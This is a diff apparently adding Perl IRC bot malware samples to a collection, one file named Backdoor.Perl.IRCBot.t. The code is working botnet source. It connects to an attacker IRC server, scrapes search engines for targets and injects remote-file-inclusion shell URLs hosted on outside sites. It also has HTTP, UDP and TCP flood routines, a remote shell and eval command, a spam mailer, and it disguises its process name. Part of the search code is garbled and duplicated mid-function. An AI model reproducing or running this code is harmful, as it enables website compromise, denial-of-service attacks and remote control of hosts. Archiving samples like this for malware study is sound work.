+# Starting Google
+	my @glist=&google($dork);
+sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 12G4o8o12g9l4e4 ".scalar(@glist)." 12Sites");
+#
+	my @mlist=&msn($dork);
+sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 7M4S7N4 ".scalar(@mlist)." 12Sites");
+#
+	my @allist=&alltheweb($dork);
+sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 7All7The7Web4 ".scalar(@allist)." 12Sites");
+#
+	my @asklist=&ask($dork);
+sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 14A4S14K4 ".scalar(@asklist)." 12Sites");
+#
+	my @aollist=&aol($dork);
+sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 7AOL4 ".scalar(@aollist)." 12Sites");
+#
+	my @lycos=&lycos($dork);
+sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 1L7yc1o7s4 ".scalar(@lycos)." 12Sites");
+#
+	my @ylist=&yahoo($dork);
+sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 13Y6ahoo4 ".scalar(@ylist)." 12Sites");
+#
+push(my @tot, @glist, @mlist, @alist, @allist, @asklist, @aollist, @lycos, @ylist );
+my @puliti=&unici(@tot);
+sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Total Results:4 ".scalar(@tot)." 12Sites and Cleaned:4 ".scalar(@puliti)." 12for 2 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %30==0){ 
+#sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Exploiting4 ".$contatore." 12of4 ".$uni. " 12Sites");
+}
+if ($contatore==$uni-1){
+sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4| Finished for2 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /Mic22/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Safe Mode = 4OFF12:.4|12 12Vuln: 4$print ");
+sendraw($IRC_cur_socket, "PRIVMSG putr4 :4|12.:4Safe Mode = 4OFF12:.4|12 12Vuln: 4$print ");
+}}
+elsif($re =~ /Mic22/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Safe Mode = 3ON12:.4|12 12Vuln: 4$print  ");
+}}
+}}}
+exit;
+}}}
+######################
+#End of MultiSCANNER # 
+#                    #
+######################
+###################################################################################
+#  		   _      _  _     ____  _      _____ _____ 			  #
+#  		  / \__/|/ \/ \   /  _ \/ \  /|/  __//__ __\			  #
+#  		  | |\/||| || |   | | \|| |\ |||  \    / \  			  #
+#  		  | |  ||| || |_/\| |_/|| | \|||  /_   | |  			  #
+#  		  \_/  \|\_/\____/\____/\_/  \|\____\  \_/  			  #
+#							     someone???Production #
+###################################################################################
+# RESERVED xD
+###################################################################################
+#  		   _      _  _     ____  _      _____ _____ 			  #
+#  		  / \__/|/ \/ \   /  _ \/ \  /|/  __//__ __\			  #
+#  		  | |\/||| || |   | | \|| |\ |||  \    / \  			  #
+#  		  | |  ||| || |_/\| |_/|| | \|||  /_   | |  			  #
+#  		  \_/  \|\_/\____/\____/\_/  \|\____\  \_/  			  #
+#							     someone???Production #
+###################################################################################
+######################
+#     HTTPFlood      # 
+#                    #
+######################
+if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
+sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4HTTP DDos12:.4|12 Attacking 4 ".$1." 12 on port 80 for 4 ".$2." 12 seconds .");
+my $itime = time;
+my ($cur_time);
+$cur_time = time - $itime;
+while ($2>$cur_time){
+$cur_time = time - $itime;
+my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
+print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
+close($socket);
+}
+sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4HTTP DDos12:.4|12 Attacking done 4 ".$1.".");
+}
+######################
+#  End of HTTPFlood  # 
+#                    #
+######################
+###################################################################################
+#  		   _      _  _     ____  _      _____ _____ 			  #
+#  		  / \__/|/ \/ \   /  _ \/ \  /|/  __//__ __\			  #
+#  		  | |\/||| || |   | | \|| |\ |||  \    / \  			  #
+#  		  | |  ||| || |_/\| |_/|| | \|||  /_   | |  			  #
+#  		  \_/  \|\_/\____/\____/\_/  \|\____\  \_/  			  #
+#							     someone???Production #
+###################################################################################
+######################
+#       MAILER       #  
+#                    #
+######################
+# For mailing use :
+# !bot @sendmail <subject> <sender> <recipient> <message>
+#
+######################
+if ($funcarg =~ /^sendmail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) {
+sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Mailer12:.4|12 Sending Mail to :2 $3");
+$subject = $1;
+$sender = $2;
+$recipient = $3; 
+@corpo = $4;
+$mailtype = "content-type: text/html";
+$sendmail = '/usr/sbin/sendmail';
+open (SENDMAIL, "| $sendmail -t");
+print SENDMAIL "$mailtype\n";
+print SENDMAIL "Subject: $subject\n"; 
+print SENDMAIL "From: $sender\n";
+print SENDMAIL "To: $recipient\n\n";
+print SENDMAIL "@corpo\n\n";
+close (SENDMAIL);
+sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Mailer12:.4|12 Mail Sended To :2 $recipient"); 
+}
+######################
+#   End of MAILER    #  
+#                    #
+######################
+######################
+#     UDPFlood       # 
+#                    #
+######################
+if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
+sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4UDP DDos12:.4|12 Attacking 4 ".$1." 12 with 4 ".$2." 12 Kb Packets for 4 ".$3." 12 seconds.");
+my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
+$dtime = 1 if $dtime == 0;
+my %bytes;
+$bytes{igmp} = $2 * $pacotes{igmp};
+$bytes{icmp} = $2 * $pacotes{icmp};
+$bytes{o} = $2 * $pacotes{o};
+$bytes{udp} = $2 * $pacotes{udp};
+$bytes{tcp} = $2 * $pacotes{tcp};
+sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4UDP DDos12:.4|12 12Results4 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 12Kb in4 ".$dtime." 12seconds to4 ".$1.".");
+}
+exit;
+}
+}
+######################
+#  End of Udpflood   # 
+#                    #
+######################
+
+
+sub ircase {
+my ($kem, $printl, $case) = @_;
+  if ($case =~ /^join (.*)/) {
+     j("$1");
+   }
+   if ($case =~ /^part (.*)/) {
+      p("$1");
+   }
+if ($case =~ /^rejoin\s+(.*)/) {
+my $chan = $1;
+if ($chan =~ /^(\d+) (.*)/) {
+for (my $ca = 1; $ca <= $1; $ca++ ) {
+p("$2");
+j("$2");
+}
+}
+else {
+p("$chan");
+j("$chan");
+}
+}
+
+if ($case =~ /^op/) {
+op("$printl", "$kem") if $case eq "op";
+my $oarg = substr($case, 3);
+op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+}
+
+if ($case =~ /^deop/) {
+deop("$printl", "$kem") if $case eq "deop";
+my $oarg = substr($case, 5);
+deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+}
+
+if ($case =~ /^msg\s+(\S+) (.*)/) {
+msg("$1", "$2");
+}
+
+if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
+for (my $cf = 1; $cf <= $1; $cf++) {
+msg("$2", "$3");
+}
+}
+
+if ($case =~ /^ctcp\s+(\S+) (.*)/) {
+ctcp("$1", "$2");
+}
+
+if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
+for (my $cf = 1; $cf <= $1; $cf++) {
+ctcp("$2", "$3");
+}
+}
+
+if ($case =~ /^nick (.*)/) {
+nick("$1");
+}
+
+if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
+conectar("$2", "$1", 6667);
+}
+
+if ($case =~ /^raw (.*)/) {
+sendraw("$1");
+}
+
+if ($case =~ /^eval (.*)/) {
+eval "$1";
+}
+}
+
+
+sub shell {
+my $printl=$_[0];
+my $comando=$_[1];
+if ($comando =~ /cd (.*)/) {
+chdir("$1") || msg("$printl", "No such file or directory");
+return;
+}
+
+elsif ($pid = fork) {
+waitpid($pid, 0);
+}
+else {
+if (fork) {
+exit;
+
+} else {
+my @resp=`$comando 2>&1 3>&1`;
+my $c=0;
+foreach my $linha (@resp) {
+  $c++;
+  chop $linha;
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
+  if ($c == "$linas_max") {
+    $c=0;
+    sleep $sleep;
+  }
+}
+exit;
+}
+}
+}
+
+sub tcpflooder {
+my $itime = time;
+my ($cur_time);
+my ($ia,$pa,$proto,$j,$l,$t);
+$ia=inet_aton($_[0]);
+$pa=sockaddr_in($_[1],$ia);
+$ftime=$_[2];
+$proto=getprotobyname('tcp');
+$j=0;$l=0;
+$cur_time = time - $itime;
+while ($l<1000){
+$cur_time = time - $itime;
+last if $cur_time >= $ftime;
+$t="SOCK$l";
+socket($t,PF_INET,SOCK_STREAM,$proto);
+connect($t,$pa)||$j--;
+$j++;$l++;
+}
+$l=0;
+while ($l<1000){
+$cur_time = time - $itime;
+last if $cur_time >= $ftime;
+$t="SOCK$l";
+shutdown($t,2);
+$l++;
+}
+}
+
+
+
+sub udpflooder {
+my $iaddr = inet_aton($_[0]);
+my $msg = 'A' x $_[1];
+my $ftime = $_[2];
+my $cp = 0;
+my (%pacotes);
+$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
+socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
+socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
+socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
+socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
+return(undef) if $cp == 4;
+my $itime = time;
+my ($cur_time);
+while ( 1 ) {
+for (my $porta = 1;
+$porta <= 65000; $porta++) {
+$cur_time = time - $itime;
+last if $cur_time >= $ftime;
+send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
+send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
+send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
+send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
+
+
+for (my $pc = 3;
+$pc <= 255;$pc++) {
+next if $pc == 6;
+$cur_time = time - $itime;
+last if $cur_time >= $ftime;
+socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
+send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
+}
+}
+last if $cur_time >= $ftime;
+}
+return($cur_time, %pacotes);
+}
+
+sub ctcp {
+return unless $#_ == 1;
+sendraw("PRIVMSG $_[0] :\001$_[1]\001");
+}
+
+sub msg {
+return unless $#_ == 1;
+sendraw("PRIVMSG $_[0] :$_[1]");
+}
+
+sub notice {
+return unless $#_ == 1;
+sendraw("NOTICE $_[0] :$_[1]");
+}
+
+sub op {
+return unless $#_ == 1;
+sendraw("MODE $_[0] +o $_[1]");
+}
+
+sub deop {
+return unless $#_ == 1;
+sendraw("MODE $_[0] -o $_[1]");
+}
+
+sub j {
+&join(@_);
+}
+
+sub join {
+return unless $#_ == 0;
+sendraw("JOIN $_[0]");
+
+}
+sub p { part(@_);
+}
+
+sub part {
+sendraw("PART $_[0]");
+}
+
+sub nick {
+return unless $#_ == 0;
+sendraw("NICK $_[0]");
+}
+
+sub quit {
+sendraw("QUIT :$_[0]");
+}
+
+sub fetch(){
+my $rnd=(int(rand(9999)));
+my $n= 80;
+if ($rnd<5000) { $n<<=1;}
+my $s= (int(rand(10)) * $n);
+{
+my @dominios = ("removed-them-all");
+my @str;
+foreach $dom  (@dominios)
+{
+push (@str,"@gstring");
+}
+my $query="www.google.com/search?q=";
+$query.=$str[(rand(scalar(@str)))];
+$query.="&num=$n&start=$s";
+my @lst=();
+sendraw("privmsg #debug :DEBUG only test googling: ".$query."");
+my $page = http_query($query);
+while ($page =~  m/<a href=\"?http:\/\/([^>\"]+)\"? class=l>/g){
+if ($1 !~ m/google|cache|translate/){
+push (@lst,$1);
+}
+}
+return (@lst);
+}
+
+
+sub yahoo(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=1000;$b+=100){
+my $Ya=("http://search.yahoo.com/search?ei=UTF-8&p=".key($key)."&n=100&fr=sfp&b=".$b);
+my $Res=query($Ya);
+while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){
+my $k=$1;
+$k=~s/<b>//g;
+$k=~s/<\/b>//g;
+$k=~s/<wbr>//g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub msn(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=1000;$b+=10){
+my $MsN=("http://search.live.com/results.aspx?q=".key($key)."&first=".$b."&FORM=PERE");
+my $Res=query($MsN);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if($1 !~ /msn|live/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+sub lycos(){
+my $inizio=0;
+my $pagine=20;
+my $key=$_[0];
+my $av=0;
+my @lst;
+while($inizio <= $pagine){
+my $lycos="http://search.lycos.com/?query=".key($key)."&page=$av";
+my $Res=query($lycos);
+while ($Res=~ m/<span class=\"?grnLnk small\"?>http:\/\/(.+?)\//g ){
+my $k="$1";
+my @grep=links($k);
+push(@lst,@grep);
+}
+$inizio++;
+$av++;
+}
+return @lst;
+}
+
+#####
+sub aol(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=100;$b++){
+my $AoL=("http://search.aol.com/aol/search?query=".key($key)."&page=".$b."&nt=null&ie=UTF-8");
+my $Res=query($AoL);
+while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+#####
+sub ask(){
+my @lst;
+my $key=$_[0];
+my $i=0;
+my $pg=0;
+for($i=0; $i<=1000; $i+=10)
+{
+my $Ask=("http://it.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all");
+my $Res=query($Ask);
+while($Res=~m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g){
+my $k=$3;
+$k=~s/[\"\ ]//g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+#####
+sub alltheweb()
+{
+my @lst;
+my $key=$_[0];
+my $i=0;
+my $pg=0;
+for($i=0; $i<=1000; $i+=100)
+{
+my $all=("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i);
+my $Res=query($all);
+while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){
+my $k=$1;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub google(){
+my @lst;
+my $key = $_[0];
+for($b=0;$b<=100;$b+=100){
+my $Go=("http://www.goog){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=100;$b++){
+my $AoL=("http://search.aol.com/aol/search?query=".key($key)."&page=".$b."&nt=null&ie=UTF-8");
+my $Res=query($AoL);
+while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+#####
+sub ask(){
+my @lst;
+my $key=$_[0];
+my $i=0;
+my $pg=0;
+for($i=0; $i<=1000; $i+=10)
+{
+my $Ask=("http://it.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all");
+my $Res=query($Ask);
+while($Res=~m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g){
+my $k=$3;
+$k=~s/[\"\ ]//g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+#####
+sub alltheweb()
+{
+my @lst;
+my $key=$_[0];
+my $i=0;
+my $pg=0;
+for($i=0; $i<=1000; $i+=100)
+{
+my $all=("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i);
+my $Res=query($all);
+while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){
+my $k=$1;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub google(){
+my @lst;
+my $key = $_[0];
+for($b=0;$b<=100;$b+=100){
+my $Go=("http://www.google.it/search?hl=it&q=".key($key)."&num=100&filter=0&start=".$b);
+my $Res=query($Go);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if ($1 !~ /google/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+
+sub links()
+{
+my @l;
+my $link=$_[0];
+my $host=$_[0];
+my $hdir=$_[0];
+$hdir=~s/(.*)\/[^\/]*$/\1/;
+$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+$host.="/";
+$link.="/";
+$hdir.="/";
+$host=~s/\/\//\//g;
+$hdir=~s/\/\//\//g;
+$link=~s/\/\//\//g;
+push(@l,$link,$host,$hdir);
+return @l;
+}
+
+sub geths(){
+my $host=$_[0];
+$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+return $host;
+}
+
+sub key(){
+my $chiave=$_[0];
+$chiave =~ s/ /\+/g;
+$chiave =~ s/:/\%3A/g;
+$chiave =~ s/\//\%2F/g;
+$chiave =~ s/&/\%26/g;
+$chiave =~ s/\"/\%22/g;
+$chiave =~ s/,/\%2C/g;
+$chiave =~ s/\\/\%5C/g;
+return $chiave;
+}
+
+sub query($){
+my $url=$_[0];
+$url=~s/http:\/\///;
+my $host=$url;
+my $query=$url;
+my $page="";
+$host=~s/href=\"?http:\/\///;
+$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+$query=~s/$host//;
+if ($query eq "") {$query="/";};
+eval {
+my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
+print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+my @r = <$sock>;
+$page="@r";
+close($sock);
+};
+return $page;
+}
+
+sub unici{
+my @unici = ();
+my %visti = ();
+foreach my $elemento ( @_ )
+{
+next if $visti{ $elemento }++;
+push @unici, $elemento;
+}   
+return @unici;
+}
+
+sub http_query($){
+my ($url) = @_;
+my $host=$url;
+my $query=$url;
+my $page="";
+$host =~ s/href=\"?http:\/\///;
+$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+$query =~s/$host//;
+if ($query eq "") {$query="/";};
+eval {
+local $SIG{ALRM} = sub { die "1";};
+alarm 10;
+my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
+print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+my @r = <$sock>;
+$page="@r";
+alarm 0;
+close($sock);
+};
+return $page;
+}
+}
+
+###################################################################################
+#  		   _      _  _     ____  _      _____ _____ 			  #
+#  		  / \__/|/ \/ \   /  _ \/ \  /|/  __//__ __\			  #
+#  		  | |\/||| || |   | | \|| |\ |||  \    / \  			  #
+#  		  | |  ||| || |_/\| |_/|| | \|||  /_   | |  			  #
+#  		  \_/  \|\_/\____/\____/\_/  \|\____\  \_/  			  #
+#							     someone???Production #
+###################################################################################
+
+
diff --git a/Perl/Backdoor.Perl.IRCBot.t b/Perl/Backdoor.Perl.IRCBot.t
new file mode 100644
index 00000000..f1bc1a86
--- /dev/null
+++ b/Perl/Backdoor.Perl.IRCBot.t
@@ -0,0 +1,1265 @@
+#################################
+# MrNETi                       ##
+# Author: Tc-Team.com          ##
+# TC-CREW     production       ##
+# We Are: MrNETi ^ ColdFire    ##
+#################################
+
+
+$process      = "/sbin/mingetty tty1"; ## process
+my $printcmd  = "http://www.amdgchoir.com/gallery/r57.txt?"; ## r57;c99 shell
+my $id        = "http://landleben.bieswang.de/cache/id.txt??"; ## ID is private !! 
+my $spread    = "?"; ## spread
+my $ircserver = "irc.darksin.it"; ## ur irc server
+my $start     = "!scan"; ## command to start scan
+my $port      = "6667"; ## irc server port
+my $nickname  = "[o0o]" . int( rand(99) ) . ""; ## nickname
+my $admin     = "n4sty"; ## msg prv
+my $channel   = "#TeRmInAtOr"; ## chan
+my $chanres   = "#TeRmInAtOr"; ## channel print result
+my $verz      = "ATL // Fams";
+
+print "\n";
+print "  RFI Start !!\n";
+print "  MrFams By pwn3d\n";
+print "  Release $verz\n";
+print "  Now join $ircserver:$port\n";
+print "  $channel and $chanres\n";
+print "  Fams Security Clan ;)\n\n";
+
+use IO::Socket::INET;
+use HTTP::Request;
+use LWP::UserAgent;
+require LWP;
+$|++;
+
+my $pid = fork;
+exit if $pid;
+$0 = "$process" . "\0" x 16;
+my $dsp = IO::Socket::INET->new(
+    PeerAddr => "$ircserver",
+    PeerPort => "$port",
+    Proto    => "tcp"
+) or die "Can not connect on server!\n";
+$dsp->autoflush(1);
+print $dsp "NICK $nickname\r\n";
+print $dsp "USER Fams 8 *  : &verz \r\n";
+print $dsp "JOIN $channel\r\n";
+print $dsp "PRIVMSG $channel :4!scan15 bug dork & 1!12G4o13o12g9l4e 15bug dork\r\n";
+sleep(1);
+print $dsp "NICK $nickname\r\n";
+print $dsp "USER priv8 8 *  : $verz \r\n";
+print $dsp "JOIN $chanres\r\n";
+print $dsp "PRIVMSG $chanres :4Alb-Team;)\r\n";
+print $dsp "PRIVMSG $chanres :4Created By KoRn\r\n";
+while ( $line = <$dsp> ) {
+
+    $line =~ s/\r\n$//;
+    if ( $line =~ /^PING \:(.*)/ ) {
+        print "PONG :$1";
+        print $dsp "PONG :$1";
+    }
+
+    if ( $line =~ /PRIVMSG $channel :!help/ ) {
+        sleep(1);
+        display( $dsp,"PRIVMSG $channel :7,12Good Luck ..");
+        display( $dsp,"PRIVMSG $channel :7Help !Scan bug dork & 1!12G4o8o12g9l4e 7bug dork");
+        display( $dsp,
+            "PRIVMSG $channel :7 HelP Info?? Command is : !info"
+        );
+    }
+
+    if ( $line =~ /PRIVMSG $channel :!info/ ) {
+        my $sysos  = `uname -sr`;
+        my $uptime = `uptime`;
+        if ( $sysos =~ /freebsd/i ) {
+            $sysname = `hostname`;
+            $memory =
+`expr \`cat /var/run/dmesg.boot | grep "real memory" | cut -f5 -d" "\` \/ 1048576`;
+            $swap = `$toploc | grep -i swap | cut -f2 -d" " | cut -f1 -d"M"`;
+            chomp($memory);
+            chomp($swap);
+        }
+
+        elsif ( $sysos =~ /linux/i ) {
+            $sysname = `hostname -f`;
+            $memory  = `free -m |grep -i mem | awk '{print \$2}'`;
+            $swap    = `free -m |grep -i swap | awk '{print \$2}'`;
+            chomp($swap);
+            chomp($memory);
+        }
+        else {
+            $sysname = "No Found";
+            $memory  = "No found";
+            $swap    = "No Found";
+        }
+        $uptime  =~ s/\n//g;
+        $sysname =~ s/\n//g;
+        $sysos   =~ s/\n//g;
+        sleep(1);
+        display( $dsp,"PRIVMSG $channel :7[4I7nfo] G3o...");
+        display( $dsp,"PRIVMSG $channel :7[4I7nfo] IrcServer/Port: $ircserver - $port");
+        display( $dsp,"PRIVMSG $channel :7[4I7nfo] Hostname: $sysos ");
+        display( $dsp,"PRIVMSG $channel :7[4I7nfo] Process/PID: $admin - $$");
+        display( $dsp,"PRIVMSG $channel :7[4I7nfo] Uptime: $uptime" );
+        display( $dsp,"PRIVMSG $channel :7[4I7nfo] Memory/Swap: $memory - $swap");
+        display( $dsp,"PRIVMSG $channel :7[4I7nfo] Admin:16 $admin");     
+		}
+
+    if ( $line =~ /PRIVMSG $channel :!id/ )
+    {    ## йй Script made by princeteam1979 . Don't remove this comment !
+        my $testid = $id;
+        my $req    = HTTP::Request->new( GET => $testid );
+        my $ua     = LWP::UserAgent->new();
+        $ua->timeout(5);
+        my $response = $ua->request($req);
+        if ( $response->is_success ) {
+            my $re = $response->content;
+            if ( $re =~ /<\?php/ ) {
+                sleep(1);
+                display( $dsp,"PRIVMSG $channel :4,1Id Work");
+				}
+        }
+        else {
+            sleep(1);
+            display( $dsp,"PRIVMSG $channel :7[4I7nfo] ID Is Dead ..Scan OUT.!!!");
+            display( $dsp,"PRIVMSG $channel :7[4I7nfo] 7Scan OUT 10 secs!!");
+            sleep(10);
+            display( $dsp,"PRIVMSG $channel :7[4I7nfo] Exiting..." );
+            display( $dsp, "QUIT" );
+        }
+    }
+
+    if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) {
+        if ( my $pid = fork ) {
+            waitpid( $pid, 0 );
+        }
+        else {
+            if (fork) {
+                exit;
+            }
+            else {
+                my $bug       = $1;
+                my $dork      = $2;
+                my $contatore = 0;
+                my %hosts;
+                sleep(1);
+                display( $dsp,"PRIVMSG $channel :7,1Ok... Start 1,4 $dork");
+                my @google = &googlet($dork);
+                push( my @tot, @google );
+                my @puliti = &unici(@tot);
+                display( $dsp,"PRIVMSG $channel :7[3$channel7] 12G4o4o12g9l4e 12[]8[]4[] ".scalar(@tot)."3 for exploited... 4 ".scalar(@puliti)."3 =>  4$dork");
+                my $uni = scalar(@puliti);
+
+                foreach my $site (@puliti) {
+                    $contatore++;
+                    if ( $contatore % 100 == 0 ) {
+                    }
+                    if ( $contatore == $uni - 1 ) {
+                    display( $dsp,"PRIVMSG $channel :7[3$channel7] 12G4o4o12g9l4e 4FINISHED 7for 4$dork 12[]8[]4[]");
+                    }
+                    my $test  = "http://".$site.$bug.$id."?";
+                    my $print = "http://".$site.$bug.$printcmd."?";
+                    my $req   = HTTP::Request->new( GET => $test );
+                    my $ua    = LWP::UserAgent->new();
+                    $ua->timeout(5);
+                    my $response = $ua->request($req);
+                    if ( $response->is_success ) {
+                        my $re = $response->content;
+                        if ( $re =~ /princeteam1979/ && $re =~ /uid=/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4] Result...");
+                                display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4] Uptime: $up");
+                                display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4] Uname -a: $un");
+                                display( $dsp,"PRIVMSG $admin   :4[12G4o4o12g9l4e4] Uname -a: $un");
+                                display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4] Id: $id1");
+                                display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4] Pwd: $pwd1");
+                                display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4] Server Ip: $ip1");
+                                display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4] Server Name: $name1");
+                                display( $dsp,"PRIVMSG $admin   :4[12G4o4o12g9l4e4] Safe: $print");
+                                display( $dsp,"PRIVMSG $chanres :4[12G4o4o12g9l4e4] Safe Mode OFF: $print");
+                                my $test2 ="http://".$site.$bug.$spread."?";
+                                my $reqz = HTTP::Request->new( GET => $test2 );
+                                my $ua = LWP::UserAgent->new();
+                                my $response = $ua->request($reqz);
+                            }
+                        }
+                        elsif ( $re =~ /princeteam1979/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4] Result...");
+                                display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4] Safe Mode ON: $print");
+                                display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4] Uname -a: $un");
+                                display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4] Server Ip: $ip1");
+                                display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4] Server Name $name1");
+                                display( $dsp,"PRIVMSG $chanres :4[12G4o4o12g9l4e4] Safe Mode ON: $print");
+								my $test2 ="http://".$site.$bug.$spread."?";
+                                my $reqz = HTTP::Request->new( GET => $test2 );
+                                my $ua = LWP::UserAgent->new();
+                                my $response = $ua->request($reqz);
+
+								}
+                        }
+                    }
+                }
+            }
+            exit;
+        }
+    }
+
+	if ( $line =~ /PRIVMSG $channel :!google\s+(.*?)\s+(.*)/ ) {
+        if ( my $pid = fork ) {
+            waitpid( $pid, 0 );
+        }
+        else {
+            if (fork) {
+                exit;
+            }
